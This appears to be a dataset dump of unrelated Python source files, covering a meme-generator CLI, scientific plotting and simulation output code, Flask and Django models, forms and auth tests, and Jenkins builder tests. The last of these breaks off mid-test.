id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
142309
|
from enum import Enum
from os import (getcwd, path as osp)
import sys
import click
import cv2
from .conf import (get_config, print_config)
from .detect.opencv import HaarCascadeDetector
from .meme.basic import Meme
from .meme.thug import ThugMeme
MEME_RESULT_DIR = getcwd()
CONTEXT = dict(help_option_names=['-h', '--help'])
class Detector(Enum):
OPEN_CV = 'opencv'
DLIB = 'dlib'
_common_decorators = [
click.version_option(None, '-v', '--version'),
click.argument('fpath', type=click.Path(exists=True)),
click.argument('txt1'),
click.argument('txt2'),
click.option(
'--override',
'-o',
type=(str, str),
multiple=True,
help='Override any configuration option: <option_name> <new_value>.'),
click.option(
'--show-config',
is_flag=True,
help='Show the configuration and exit. Takes into account -o options.')
]
def add_decorators(decorators):
def _add_decorators(func):
for decorator in reversed(decorators):
func = decorator(func)
return func
return _add_decorators
def _load_configuration(override, show_and_exit):
conf = get_config(overrides=override)
if show_and_exit:
print_config(conf)
sys.exit(0)
return conf
def _form_result_path(orig_path, result_dir, fname_extra=''):
fname = osp.basename(orig_path)
base, extension = osp.splitext(fname)
fname = '{}{}{}'.format(base, fname_extra, extension)
return osp.join(result_dir, fname)
@click.command(context_settings=CONTEXT)
@add_decorators(_common_decorators)
def meme(fpath, txt1, txt2, override, show_config):
"""Generate a normal meme."""
conf = _load_configuration(override, show_config)
res_path = _form_result_path(
orig_path=osp.abspath(fpath),
result_dir=MEME_RESULT_DIR,
fname_extra=conf['meme']['meme_result_name_add'])
meme = Meme(config=conf['meme'], img_path=fpath, txt1=txt1, txt2=txt2)
meme.create(res_file=res_path)
@click.command(context_settings=CONTEXT)
@add_decorators(_common_decorators)
@click.option(
'--debug',
is_flag=True,
help='Show debug information (e.g. the detection results img)')
@click.option(
'--detector',
type=click.Choice([Detector.OPEN_CV.value, Detector.DLIB.value]),
default=Detector.OPEN_CV.value,
help='Detector to use for finding faces and landmarks.')
def thug_meme(fpath, txt1, txt2, override, show_config, debug, detector):
"""Generate an awesome thug meme."""
fpath = osp.abspath(fpath)
conf = _load_configuration(override, show_config)
res_path = _form_result_path(
orig_path=fpath,
result_dir=MEME_RESULT_DIR,
fname_extra=conf['meme']['thug_result_name_add'])
if detector == Detector.OPEN_CV.value:
detector = HaarCascadeDetector(config=conf['detect'])
elif detector == Detector.DLIB.value:
from .detect.dlib import DlibDetector
detector = DlibDetector(config=conf['detect'])
thugs = detector.find_thug_landmarks(
img_path=osp.abspath(fpath), show_result=debug)
meme = ThugMeme(
config=conf['meme'],
thug_landmarks=thugs,
img_path=fpath,
txt1=txt1,
txt2=txt2)
meme.create(res_path)
if debug:
cv2.waitKey(0)
cv2.destroyAllWindows()
|
142335
|
import sys
log_file_path = sys.argv[1]
with open(log_file_path) as f:
lines = f.readlines()
for line in lines:
# Ignore errors from CPU instruction set or symbol existing testing
keywords = ['src.c', 'CheckSymbolExists.c']
if all([keyword not in line for keyword in keywords]):
print(line)
|
142342
|
from __future__ import print_function, absolute_import, division #makes KratosMultiphysics backward compatible with python 2.6 and 2.7
# Importing the Kratos Library
import KratosMultiphysics
from KratosMultiphysics.json_utilities import read_external_json, write_external_json
# Importing the base class
from KratosMultiphysics.json_output_process import JsonOutputProcess
def Factory(settings, Model):
if(type(settings) != KratosMultiphysics.Parameters):
raise Exception("Expected input shall be a Parameters object, encapsulating a json string")
return ParticleJsonOutputProcess(Model, settings["Parameters"])
# All the processes python processes should be derived from "Process"
class ParticleJsonOutputProcess(JsonOutputProcess):
def ExecuteBeforeSolutionLoop(self):
data = {}
data["TIME"] = []
count = 0
# Material points values
for mp in self.sub_model_part.Elements:
compute = self.__check_flag(mp)
if (compute == True):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)] = {}
else:
data["RESULTANT"] = {}
for i in range(self.params["gauss_points_output_variables"].size()):
out = self.params["gauss_points_output_variables"][i]
variable_name = out.GetString()
variable_type = KratosMultiphysics.KratosGlobals.GetVariableType(variable_name)
if (variable_type == "Double" or variable_type == "Integer" or variable_type == "Component"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
elif variable_type == "Array":
if (KratosMultiphysics.KratosGlobals.GetVariableType(variable_name + "_X") == "Double"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name + "_X"] = []
data["PARTICLE_" + str(mp.Id)][variable_name + "_Y"] = []
data["PARTICLE_" + str(mp.Id)][variable_name + "_Z"] = []
else:
if (count == 0):
data["RESULTANT"][variable_name + "_X"] = []
data["RESULTANT"][variable_name + "_Y"] = []
data["RESULTANT"][variable_name + "_Z"] = []
else:
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
elif variable_type == "Vector":
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name] = []
else:
if (count == 0):
data["RESULTANT"][variable_name] = []
count += 1
write_external_json(self.output_file_name, data)
def ExecuteFinalizeSolutionStep(self):
data = read_external_json(self.output_file_name)
time = self.sub_model_part.ProcessInfo.GetValue(KratosMultiphysics.TIME)
dt = self.sub_model_part.ProcessInfo.GetValue(KratosMultiphysics.DELTA_TIME)
self.time_counter += dt
if self.time_counter > self.frequency:
self.time_counter = 0.0
data["TIME"].append(time)
count = 0
# Material points values
for mp in self.sub_model_part.Elements:
compute = self.__check_flag(mp)
if (compute == True):
for i in range(self.params["gauss_points_output_variables"].size()):
out = self.params["gauss_points_output_variables"][i]
variable_name = out.GetString()
variable = KratosMultiphysics.KratosGlobals.GetVariable(variable_name)
variable_type = KratosMultiphysics.KratosGlobals.GetVariableType(variable_name)
values_vector = mp.CalculateOnIntegrationPoints(variable, self.sub_model_part.ProcessInfo)
value = values_vector[0]
if (variable_type == "Double" or variable_type == "Integer" or variable_type == "Component"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name].append(value)
else:
if (count == 0):
data["RESULTANT"][variable_name].append(value)
else:
data["RESULTANT"][variable_name][-1] += value
elif variable_type == "Array":
if (KratosMultiphysics.KratosGlobals.GetVariableType(variable_name + "_X") == "Double"):
if (self.resultant_solution == False):
data["PARTICLE_" + str(mp.Id)][variable_name + "_X"].append(value[0])
data["PARTICLE_" + str(mp.Id)][variable_name + "_Y"].append(value[1])
data["PARTICLE_" + str(mp.Id)][variable_name + "_Z"].append(value[2])
else:
if (count == 0):
data["RESULTANT"][variable_name + "_X"].append(value[0])
data["RESULTANT"][variable_name + "_Y"].append(value[1])
data["RESULTANT"][variable_name + "_Z"].append(value[2])
else:
data["RESULTANT"][variable_name + "_X"][-1] += value[0]
data["RESULTANT"][variable_name + "_Y"][-1] += value[1]
data["RESULTANT"][variable_name + "_Z"][-1] += value[2]
else:
if (self.resultant_solution == False):
list = self.__kratos_vector_to__python_list(value)
data["PARTICLE_" + str(mp.Id)][variable_name ].append(list)
else:
aux = 0.0
for index in range(len(value)):
aux += value[index]
if (count == 0):
data["RESULTANT"][variable_name ].append(aux)
else:
data["RESULTANT"][variable_name ][-1] += aux
elif variable_type == "Vector":
if (self.resultant_solution == False):
list = self.__kratos_vector_to__python_list(value)
data["PARTICLE_" + str(mp.Id)][variable_name].append(list)
else:
if (count == 0):
list = self.__kratos_vector_to__python_list(value)
data["RESULTANT"][variable_name][-1] += list
count += 1
write_external_json(self.output_file_name, data)
def __kratos_vector_to__python_list(self, value):
list = []
for index in range(len(value)):
list.append(value[index])
return list
def __check_flag(self, component):
if self.flag != None:
if component.Is(self.flag) == False:
return False
return True
|
142377
|
import os
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from getdist import plots
mpl.use("Agg")
roots = ["mcmc"]
params = ["beta", "alpha100", "alpha143", "alpha217", "alpha353"]
g = plots.get_subplot_plotter(
chain_dir=os.path.join(os.getcwd(), "chains"),
analysis_settings={"ignore_rows": 0.3},
)
kwargs = dict(colors=["k"], lws=[1])
g.triangle_plot(roots, params, **kwargs, diag1d_kwargs=kwargs)
# Show Minami & Komatsu results https://arxiv.org/abs/2011.11254
eb_results = {
"beta": {"mean": 0.35, "std": 0.14},
"alpha100": {"mean": -0.28, "std": 0.13},
"alpha143": {"mean": +0.07, "std": 0.12},
"alpha217": {"mean": -0.07, "std": 0.11},
"alpha353": {"mean": -0.09, "std": 0.11},
}
from scipy.stats import norm
for i, param in enumerate(params):
ax = g.subplots[i, i]
xmin, xmax, ymin, ymax = ax.axis()
x = np.linspace(xmin, xmax, 100)
posterior = norm.pdf(x, eb_results[param]["mean"], eb_results[param]["std"])
ax.plot(x, posterior / np.max(posterior), color="tab:red")
# Fake legend
g.subplots[0, 0].plot([], [], color="tab:red", label="Minami & Komatsu")
g.subplots[0, 0].plot([], [], color="k", label="PSpipe")
g.subplots[0, 0].legend(loc="upper left", bbox_to_anchor=(1, 1))
# Add table on figure
table_results = r"""
\begin{tabular} { l c}
Parameter & 68\% limits\\
\hline
{\boldmath$\alpha_{100} $} & $-0.28\pm0.13 $\\
{\boldmath$\alpha_{143} $} & $0.07 \pm0.12 $\\
{\boldmath$\alpha_{217} $} & $-0.07\pm0.11 $\\
{\boldmath$\alpha_{353} $} & $-0.09\pm0.11 $\\
{\boldmath$\beta $} & $0.35 \pm0.14 $\\
\hline
\end{tabular}
"""
with mpl.rc_context(rc={"text.usetex": True}):
table = g.sample_analyser.mcsamples[roots[0]].getTable(limit=1, paramList=params)
kwargs = dict(size=15, ha="right")
g.subplots[0, 0].text(5, +0.0, "<NAME>" + table_results.replace("\n", ""), **kwargs)
g.subplots[0, 0].text(5, -1.0, "PSpipe" + table.tableTex().replace("\n", ""), **kwargs)
plt.savefig("EB_plot_chain_results.png")
|
142416
|
import os
from subprocess import run, PIPE
try:
version = os.environ['ELASTIC_VERSION']
except KeyError:
version = run('./bin/elastic-version', stdout=PIPE).stdout.decode().strip()
|
142426
|
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, SubmitField, validators
from wtforms.validators import DataRequired
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
captcha = StringField('captcha', validators=[validators.required()])
submit = SubmitField("Login")
|
142466
|
import _plotly_utils.basevalidators
class SurfaceaxisValidator(_plotly_utils.basevalidators.EnumeratedValidator):
def __init__(self, plotly_name="surfaceaxis", parent_name="scatter3d", **kwargs):
super(SurfaceaxisValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type=kwargs.pop("edit_type", "calc"),
values=kwargs.pop("values", [-1, 0, 1, 2]),
**kwargs
)
|
142490
|
import spacy_streamlit
import typer
def main(models: str, default_text: str):
models = [name.strip() for name in models.split(",")]
spacy_streamlit.visualize(models, default_text, visualizers=["ner"])
if __name__ == "__main__":
try:
typer.run(main)
except SystemExit:
pass
|
142492
|
from sqlobject import *
from sqlobject.tests.dbtest import *
########################################
## Expiring, syncing
########################################
class SyncTest(SQLObject):
name = StringCol(length=50, alternateID=True, dbName='name_col')
def test_expire():
setupClass(SyncTest)
SyncTest(name='bob')
SyncTest(name='tim')
conn = SyncTest._connection
b = SyncTest.byName('bob')
conn.query("UPDATE sync_test SET name_col = 'robert' WHERE id = %i"
% b.id)
assert b.name == 'bob'
b.expire()
assert b.name == 'robert'
conn.query("UPDATE sync_test SET name_col = 'bobby' WHERE id = %i"
% b.id)
b.sync()
assert b.name == 'bobby'
|
142505
|
from .protoconf import (
Protoconf,
ProtoconfSync,
ProtoconfMutation,
ProtoconfMutationSync,
)
|
142533
|
from __future__ import division, absolute_import, print_function
import numpy as np
"""
A sript to generate van der Waals surface of molecules.
"""
# Van der Waals radii (in angstrom) are taken from GAMESS.
vdw_r = {'H': 1.20, 'HE': 1.20,
'LI': 1.37, 'BE': 1.45, 'B': 1.45, 'C': 1.50,
'N': 1.50, 'O': 1.40, 'F': 1.35, 'NE': 1.30,
'NA': 1.57, 'MG': 1.36, 'AL': 1.24, 'SI': 1.17,
'P': 1.80, 'S': 1.75, 'CL': 1.70}
def surface(n):
"""Computes approximately n points on unit sphere. Code adapted from GAMESS.
Parameters
----------
n : int
approximate number of requested surface points
Returns
-------
ndarray
numpy array of xyz coordinates of surface points
"""
u = []
eps = 1e-10
nequat = int(np.sqrt(np.pi*n))
nvert = int(nequat/2)
nu = 0
for i in range(nvert+1):
fi = np.pi*i/nvert
z = np.cos(fi)
xy = np.sin(fi)
nhor = int(nequat*xy+eps)
if nhor < 1:
nhor = 1
for j in range(nhor):
fj = 2*np.pi*j/nhor
x = np.cos(fj)*xy
y = np.sin(fj)*xy
if nu >= n:
return np.array(u)
nu += 1
u.append([x, y, z])
return np.array(u)
def vdw_surface(coordinates, elements, scale_factor, density, input_radii):
"""Computes points outside the van der Waals surface of molecules.
Parameters
----------
coordinates : ndarray
cartesian coordinates of the nuclei, in units of angstrom
elements : list
The symbols (e.g. C, H) for the atoms
scale_factor : float
The points on the molecular surface are set at a distance of
scale_factor * vdw_radius away from each of the atoms.
density : float
The (approximate) number of points to generate per square angstrom
of surface area. 1.0 is the default recommended by Kollman & Singh.
input_radii : dict
dictionary of user's defined VDW radii
Returns
-------
radii : dict
A dictionary of scaled VDW radii
surface_points : ndarray
array of the coordinates of the points on the surface
"""
radii = {}
surface_points = []
# scale radii
for i in elements:
if i in radii.keys():
continue
if i in input_radii.keys():
radii[i] = input_radii[i] * scale_factor
elif i in vdw_r.keys():
radii[i] = vdw_r[i] * scale_factor
else:
raise KeyError('%s is not a supported element; ' %i
+ 'use the "VDW_RADII" option to add '
+ 'its van der Waals radius.')
# loop over atomic coordinates
for i in range(len(coordinates)):
# calculate approximate number of ESP grid points
n_points = int(density * 4.0 * np.pi* np.power(radii[elements[i]], 2))
# generate an array of n_points in a unit sphere around the atom
dots = surface(n_points)
# scale the unit sphere by the VDW radius and translate
dots = coordinates[i] + radii[elements[i]] * dots
for j in range(len(dots)):
save = True
for k in range(len(coordinates)):
if i == k:
continue
# exclude points within the scaled VDW radius of other atoms
d = np.linalg.norm(dots[j] - coordinates[k])
if d < radii[elements[k]]:
save = False
break
if save:
surface_points.append(dots[j])
return np.array(surface_points), radii
|
142598
|
import unittest
from bibliopixel.util import offset_range
class OffsetRangeTest(unittest.TestCase):
def test_empty(self):
dmx = offset_range.DMXChannel.make()
self.assertEqual(dmx.index(0), None)
self.assertEqual(dmx.index(1), 0)
self.assertEqual(dmx.index(2), 1)
self.assertEqual(dmx.index(511), 510)
self.assertEqual(dmx.index(512), 511)
self.assertEqual(dmx.index(513), None)
l256 = list(range(256))
r = list(dmx.read_from(l256))
self.assertEqual(r, l256 + ([0] * 256))
target = [23] * 128
dmx.copy_to(l256, target)
self.assertEqual(target, list(range(128)))
def test_empty_copy(self):
dmx = offset_range.DMXChannel.make()
l256 = list(range(256))
r = list(dmx.read_from(l256))
self.assertEqual(r, l256 + ([0] * 256))
target = []
dmx.copy_to(l256, target)
self.assertEqual(target, [])
def test_positive_offset(self):
midi = offset_range.MidiChannel(offset=4)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(1), None)
self.assertEqual(midi.index(4), None)
self.assertEqual(midi.index(5), 0)
self.assertEqual(midi.index(6), 1)
self.assertEqual(midi.index(15), 10)
self.assertEqual(midi.index(16), 11)
self.assertEqual(midi.index(16), 11)
self.assertEqual(midi.index(17), None)
expected = [-1, -1, -1, -1] + list(range(12))
actual = list(midi.read_from(range(16), pad=-1))
self.assertEqual(expected, actual)
target = [100] * 100
midi.copy_to(list(range(16)), target)
expected = list(range(4, 16)) + [100] * 88
self.assertEqual(target, expected)
def test_negative_offset(self):
midi = offset_range.MidiChannel(-4)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(1), 4)
self.assertEqual(midi.index(2), 5)
self.assertEqual(midi.index(12), 15)
self.assertEqual(midi.index(13), None)
actual = list(midi.read_from(range(16), pad=-1))
expected = list(range(4, 16)) + [-1, -1, -1, -1]
self.assertEqual(expected, actual)
target = [100] * 8
midi.copy_to(list(range(16)), target)
expected = [4, 5, 6, 7, 8, 9, 10, 11]
self.assertEqual(target, expected)
def test_begin_end_offset(self):
midi = offset_range.MidiChannel(offset=-5, begin=6, end=8)
self.assertEqual(midi.index(0), None)
self.assertEqual(midi.index(4), None)
self.assertEqual(midi.index(5), None)
self.assertEqual(midi.index(6), 10)
self.assertEqual(midi.index(7), 11)
self.assertEqual(midi.index(8), 12)
self.assertEqual(midi.index(9), None)
self.assertEqual(midi.index(10), None)
actual = list(midi.read_from(range(16)))
expected = [0, 0, 0, 0, 0, 10, 11, 12, 0, 0, 0, 0, 0, 0, 0, 0]
self.assertEqual(expected, actual)
target = [100] * 24
midi.copy_to(list(range(7)), target)
expected = 5 * [100] + [5, 6] + 17 * [100]
self.assertEqual(target, expected)
target = [100] * 24
midi.copy_to(list(range(8)), target)
expected = 5 * [100] + [5, 6, 7] + 16 * [100]
self.assertEqual(target, expected)
target = [100] * 24
midi.copy_to(list(range(9)), target)
expected = 5 * [100] + [5, 6, 7] + 16 * [100]
self.assertEqual(target, expected)
def test_errors(self):
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=0)
offset_range.MidiChannel(begin=1)
offset_range.MidiChannel(begin=16)
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=17)
with self.assertRaises(ValueError):
offset_range.MidiChannel(end=0)
offset_range.MidiChannel(end=1)
offset_range.MidiChannel(end=16)
with self.assertRaises(ValueError):
offset_range.MidiChannel(end=17)
with self.assertRaises(ValueError):
offset_range.MidiChannel(begin=2, end=1)
|
142601
|
from . import app
from flask_sqlalchemy import SQLAlchemy
import datetime
import os
# SQLAlchemy setup
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+os.path.join(basedir, '../data.sqlite')
app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True
db = SQLAlchemy(app)
class Software(db.Model):
"""
Entity class for an item of software submitted for assessment
"""
__tablename__ = 'software'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
name = db.Column(db.Text)
description = db.Column(db.Text)
version = db.Column(db.Text)
submitter = db.Column(db.Text)
submitted = db.Column(db.DateTime, default=datetime.datetime.now())
url = db.Column(db.Text)
scores = db.relationship('Score', backref='software', lazy='dynamic')
class Score(db.Model):
"""
Entity class for the result of running a metric against an item of software
"""
__tablename__ = 'score'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
software_id = db.Column(db.Integer, db.ForeignKey('software.id'))
name = db.Column(db.Text)
identifier = db.Column(db.Text)
category = db.Column(db.Text)
short_description = db.Column(db.Text)
long_description = db.Column(db.Text)
interactive = db.Column(db.Boolean)
value = db.Column(db.Integer)
feedback = db.Column(db.Text)
category_importance = db.Column(db.Integer)
metric_importance = db.Column(db.Integer)
updated = db.Column(db.TIMESTAMP, server_default=db.func.now(), onupdate=db.func.current_timestamp())
def __init__(self, software_id, name, identifier, category, short_description, long_description, interactive, value,
feedback, category_importance=1, metric_importance=1):
self.software_id = software_id
self.name = name
self.identifier = identifier
self.category = category
self.short_description = short_description
self.long_description = long_description
self.interactive = interactive
self.value = value
self.feedback = feedback
self.category_importance = category_importance
self.metric_importance = metric_importance
# Create database if required
if not os.path.exists(app.config['SQLALCHEMY_DATABASE_URI']):
app.logger.info("Creating tables in ./data.sqlite")
db.create_all()
|
142628
|
def main(name="User", name2="<NAME>"):
print(f"Hello, {name}! I am {name2}!")
if __name__=="__main__":
main()
|
142683
|
from django.test import TestCase
from django.conf import settings
import json
from newt.tests import MyTestClient, newt_base_url, login
class AuthTests(TestCase):
fixtures = ["test_fixture.json"]
def setUp(self):
self.client = MyTestClient()
def test_login(self):
# Should not be logged in
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
# Should be logged in
r = self.client.post(newt_base_url + "/auth", data=login)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
# Loggen in self.client should return user info
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
def test_logout(self):
# Should be logged in
r = self.client.post(newt_base_url + "/auth", data=login)
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], True)
self.assertEquals(json_response['output']['username'], login['username'])
r = self.client.delete(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
r = self.client.get(newt_base_url + "/auth")
self.assertEquals(r.status_code, 200)
json_response = r.json()
self.assertEquals(json_response['output']['auth'], False)
|
142686
|
from __future__ import absolute_import
import mock
import os.path
import responses
import pytest
import re
import time
from flask import current_app
from uuid import UUID
from changes.config import db, redis
from changes.constants import Status, Result
from changes.lib.artifact_store_lib import ArtifactState
from changes.lib.artifact_store_mock import ArtifactStoreMock
from changes.models.artifact import Artifact
from changes.models.failurereason import FailureReason
from changes.models.filecoverage import FileCoverage
from changes.models.job import Job
from changes.models.log import LogSource
from changes.models.patch import Patch
from changes.models.test import TestCase
from changes.models.testartifact import TestArtifact
from changes.backends.jenkins.builder import JenkinsBuilder, MASTER_BLACKLIST_KEY, JENKINS_LOG_NAME
from changes.testutils import (
BackendTestCase, eager_tasks, SAMPLE_DIFF, SAMPLE_XUNIT, SAMPLE_COVERAGE,
SAMPLE_XUNIT_TESTARTIFACTS
)
class BaseTestCase(BackendTestCase):
builder_cls = JenkinsBuilder
builder_options = {
'master_urls': ['http://jenkins.example.com'],
'diff_urls': ['http://jenkins-diff.example.com'],
'job_name': 'server',
}
def setUp(self):
self.project = self.create_project()
ArtifactStoreMock.reset()
super(BaseTestCase, self).setUp()
def get_builder(self, **options):
base_options = self.builder_options.copy()
base_options.update(options)
return self.builder_cls(app=current_app, **base_options)
def load_fixture(self, filename):
filepath = os.path.join(
os.path.dirname(__file__),
filename,
)
with open(filepath, 'rb') as fp:
return fp.read()
class CreateBuildTest(BaseTestCase):
def test_sets_cluster(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder(cluster='foobar')
with mock.patch.object(builder, 'create_jenkins_build') as create_jenkins_build:
def fake_update(step, **kwargs):
step.data.update({'master': 'fake', 'item_id': '99', 'build_no': None})
return {'queued': True}
create_jenkins_build.side_effect = fake_update
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.cluster == 'foobar'
@responses.activate
def test_queued_creation(self):
job_id = '81d1596fd4d642f4a6bdf86c45e014e8'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
body=self.load_fixture('fixtures/GET/queue_item_by_job_id.xml'))
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?depth=1&xpath=/queue/item\\[action/parameter/name=%22CHANGES_BID%22%20and%20action/parameter/value=%22.*?%22\\]/id'),
status=404)
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(job_id))
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': None,
'item_id': '13',
'job_name': 'server',
'queued': True,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
def test_active_creation(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data == {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'uri': None,
'master': 'http://jenkins.example.com',
}
@responses.activate
@mock.patch.object(JenkinsBuilder, '_find_job')
def test_patch(self, find_job):
responses.add(
responses.POST, 'http://jenkins-diff.example.com/job/server/build',
body='',
status=201)
find_job.return_value = {
'build_no': '1',
'item_id': None,
'job_name': 'server',
'queued': False,
'master': 'http://jenkins-diff.example.com',
}
patch = Patch(
repository=self.project.repository,
parent_revision_sha='7ebd1f2d750064652ef5bbff72452cc19e1731e0',
diff=SAMPLE_DIFF,
)
db.session.add(patch)
source = self.create_source(self.project, patch=patch)
build = self.create_build(self.project, source=source)
job = self.create_job(
build=build,
id=UUID('81d1596fd4d642f4a6bdf86c45e014e8')
)
builder = self.get_builder()
builder.create_job(job)
@responses.activate
def test_multi_master(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list.json'),
status=200)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
@responses.activate
def test_multi_master_one_bad(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.GET, 'http://jenkins-2.example.com/queue/api/json/',
body=self.load_fixture('fixtures/GET/queue_list_other_jobs.json'),
status=200)
# This one has a failure status.
responses.add(
responses.GET, 'http://jenkins.example.com/queue/api/json/',
body='',
status=503)
responses.add(
responses.POST, 'http://jenkins-2.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins-2\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
builder.create_job(job)
step = job.phases[0].steps[0]
assert step.data['master'] == 'http://jenkins-2.example.com'
def test_pick_master_with_blacklist(self):
redis.sadd(MASTER_BLACKLIST_KEY, 'http://jenkins.example.com')
builder = self.get_builder()
builder.master_urls = [
'http://jenkins.example.com',
'http://jenkins-2.example.com',
]
assert 'http://jenkins-2.example.com' == builder._pick_master('job1')
@responses.activate
def test_jobstep_replacement(self):
job_id = 'f9481a17aac446718d7893b6e1c6288b'
responses.add(
responses.POST, 'http://jenkins.example.com/job/server/build',
body='',
status=201)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/queue/api/xml/\\?xpath=%2Fqueue%2Fitem%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fid&wrapper=x'),
status=404)
responses.add(
responses.GET,
re.compile('http://jenkins\\.example\\.com/job/server/api/xml/\\?xpath=%2FfreeStyleProject%2Fbuild%5Baction%2Fparameter%2Fname%3D%22CHANGES_BID%22\\+and\\+action%2Fparameter%2Fvalue%3D%22.*?%22%5D%2Fnumber&depth=1&wrapper=x'),
body=self.load_fixture('fixtures/GET/build_item_by_job_id.xml'))
build = self.create_build(self.project)
job = self.create_job(
build=build,
id=UUID(hex=job_id),
)
builder = self.get_builder()
builder.create_job(job)
failstep = job.phases[0].steps[0]
failstep.result = Result.infra_failed
failstep.status = Status.finished
db.session.add(failstep)
